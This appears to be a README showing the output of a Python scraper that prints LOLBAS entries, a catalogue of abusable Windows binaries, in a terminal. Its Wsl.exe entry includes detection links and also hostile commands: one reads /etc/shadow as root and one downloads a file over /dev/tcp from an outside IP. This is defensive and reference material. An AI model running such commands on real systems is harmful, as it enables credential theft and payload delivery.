Webscrapper written in python3 to show lolbas in a terminal
┌──(root💀ghost)-[/home/ghost]
└─# python3 lolbas.py
.____ ________ .____ __________ _____ _________
| | \_____ \ | | \______ \ / _ \ / _____/
| | / | \| | | | _/ / /_\ \ \_____ \
| |___/ | \ |___| | \/ | \/ \
|_______ \_______ /_______ \______ /\____|__ /_______ /
\/ \/ \/ \/ \/ \/
Living Off The Land Binaries, Scripts and Libraries
For more info on the project, click on the logo.
If you want to contribute, check out our contribution guide. Our criteria list sets out what we define as a LOLBin/Script/Lib.
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation. You can see the current ATT&CK® mapping of this project on the ATT&CK® Navigator.
If you are looking for UNIX binaries, please visit gtfobins.github.io.
[+] AppInstaller.exe
[+] Aspnet_Compiler.exe
[+] At.exe
[+] Atbroker.exe
[+] Bash.exe
[+] Bitsadmin.exe
[+] CertOC.exe
[+] CertReq.exe
[+] Certutil.exe
[+] Cmd.exe
[+] Cmdkey.exe
[+] cmdl32.exe
[+] Cmstp.exe
[+] ConfigSecurityPolicy.exe
[+] Conhost.exe
[+] Control.exe
[+] Csc.exe
[+] Cscript.exe
[+] CustomShellHost.exe
[+] DataSvcUtil.exe
[+] Desktopimgdownldr.exe
[+] DeviceCredentialDeployment.exe
[+] Dfsvc.exe
[+] Diantz.exe
[+] Diskshadow.exe
[+] Dnscmd.exe
[+] Esentutl.exe
[+] Eventvwr.exe
[+] Expand.exe
[+] Explorer.exe
[+] Extexport.exe
[+] Extrac32.exe
[+] Findstr.exe
[+] Finger.exe
[+] fltMC.exe
[+] Forfiles.exe
[+] Ftp.exe
[+] GfxDownloadWrapper.exe
[+] Gpscript.exe
[+] Hh.exe
[+] IMEWDBLD.exe
[+] Ie4uinit.exe
[+] Ieexec.exe
[+] Ilasm.exe
[+] Infdefaultinstall.exe
[+] Installutil.exe
[+] Jsc.exe
[+] Ldifde.exe
[+] Makecab.exe
[+] Mavinject.exe
[+] Microsoft.Workflow.Compiler.exe
[+] Mmc.exe
[+] MpCmdRun.exe
[+] Msbuild.exe
[+] Msconfig.exe
[+] Msdt.exe
[+] Mshta.exe
[+] Msiexec.exe
[+] Netsh.exe
[+] Odbcconf.exe
[+] OfflineScannerShell.exe
[+] OneDriveStandaloneUpdater.exe
[+] Pcalua.exe
[+] Pcwrun.exe
[+] Pktmon.exe
[+] Pnputil.exe
[+] Presentationhost.exe
[+] Print.exe
[+] PrintBrm.exe
[+] Psr.exe
[+] Rasautou.exe
[+] rdrleakdiag.exe
[+] Reg.exe
[+] Regasm.exe
[+] Regedit.exe
[+] Regini.exe
[+] Register-cimprovider.exe
[+] Regsvcs.exe
[+] Regsvr32.exe
[+] Replace.exe
[+] Rpcping.exe
[+] Rundll32.exe
[+] Runonce.exe
[+] Runscripthelper.exe
[+] Sc.exe
[+] Schtasks.exe
[+] Scriptrunner.exe
[+] Setres.exe
[+] SettingSyncHost.exe
[+] ssh.exe
[+] Stordiag.exe
[+] SyncAppvPublishingServer.exe
[+] Ttdinject.exe
[+] Tttracer.exe
[+] Unregmp2.exe
[+] vbc.exe
[+] Verclsid.exe
[+] Wab.exe
[+] winget.exe
[+] Wlrmdr.exe
[+] Wmic.exe
[+] WorkFolders.exe
[+] Wscript.exe
[+] Wsreset.exe
[+] wuauclt.exe
[+] Xwizard.exe
[+] fsutil.exe
[+] Advpack.dll
[+] Desk.cpl
[+] Dfshim.dll
[+] Ieadvpack.dll
[+] Ieframe.dll
[+] Mshtml.dll
[+] Pcwutl.dll
[+] Setupapi.dll
[+] Shdocvw.dll
[+] Shell32.dll
[+] Syssetup.dll
[+] Url.dll
[+] Zipfldr.dll
[+] Comsvcs.dll
[+] AccCheckConsole.exe
[+] adplus.exe
[+] AgentExecutor.exe
[+] Appvlp.exe
[+] Bginfo.exe
[+] Cdb.exe
[+] coregen.exe
[+] Createdump.exe
[+] csi.exe
[+] DefaultPack.EXE
[+] Devtoolslauncher.exe
[+] dnx.exe
[+] Dotnet.exe
[+] Dump64.exe
[+] Dxcap.exe
[+] Excel.exe
[+] Fsi.exe
[+] FsiAnyCpu.exe
[+] Mftrace.exe
[+] Msdeploy.exe
[+] MsoHtmEd.exe
[+] Mspub.exe
[+] msxsl.exe
[+] ntdsutil.exe
[+] Powerpnt.exe
[+] Procdump.exe
[+] ProtocolHandler.exe
[+] rcsi.exe
[+] Remote.exe
[+] Sqldumper.exe
[+] Sqlps.exe
[+] SQLToolsPS.exe
[+] Squirrel.exe
[+] te.exe
[+] Tracker.exe
[+] Update.exe
[+] VSIISExeLauncher.exe
[+] VisualUiaVerifyNative.exe
[+] vsjitdebugger.exe
[+] Wfc.exe
[+] Winword.exe
[+] Wsl.exe
[+] CL_LoadAssembly.ps1
[+] CL_Mutexverifiers.ps1
[+] CL_Invocation.ps1
[+] Manage-bde.wsf
[+] Pubprn.vbs
[+] Syncappvpublishingserver.vbs
[+] UtilityFunctions.ps1
[+] winrm.vbs
[+] Pester.bat
[(L0LBAS)]> Wsl.exe
[Execute]
Download
Windows subsystem for Linux executable
Paths:
C:\Windows\System32\wsl.exe
Resources:
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Acknowledgements:
Alex Ionescu (@aionescu)
Matt (@NotoriousRebel1)
Asif Matadar (@d1r4c)
Detection:
Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_wsl_lolbin.yml
BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
IOC: Child process from wsl.exe
[Execute]
wsl.exe -e /mnt/c/Windows/System32/calc.exe
wsl.exe -u root -e cat /etc/shadow
wsl.exe --exec bash -c 'cat file'
Download
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Or
┌──(root💀ghost)-[/home/ghost]
└─# python3 lolbas.py Wsl.exe
.____ ________ .____ __________ _____ _________
| | \_____ \ | | \______ \ / _ \ / _____/
| | / | \| | | | _/ / /_\ \ \_____ \
| |___/ | \ |___| | \/ | \/ \
|_______ \_______ /_______ \______ /\____|__ /_______ /
\/ \/ \/ \/ \/ \/
Living Off The Land Binaries, Scripts and Libraries
For more info on the project, click on the logo.
If you want to contribute, check out our contribution guide. Our criteria list sets out what we define as a LOLBin/Script/Lib.
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation. You can see the current ATT&CK® mapping of this project on the ATT&CK® Navigator.
If you are looking for UNIX binaries, please visit gtfobins.github.io.
[Execute]
Download
Windows subsystem for Linux executable
Paths:
C:\Windows\System32\wsl.exe
Resources:
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Acknowledgements:
Alex Ionescu (@aionescu)
Matt (@NotoriousRebel1)
Asif Matadar (@d1r4c)
Detection:
Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_wsl_lolbin.yml
BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
IOC: Child process from wsl.exe
[Execute]
wsl.exe -e /mnt/c/Windows/System32/calc.exe
wsl.exe -u root -e cat /etc/shadow
wsl.exe --exec bash -c 'cat file'
Download
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'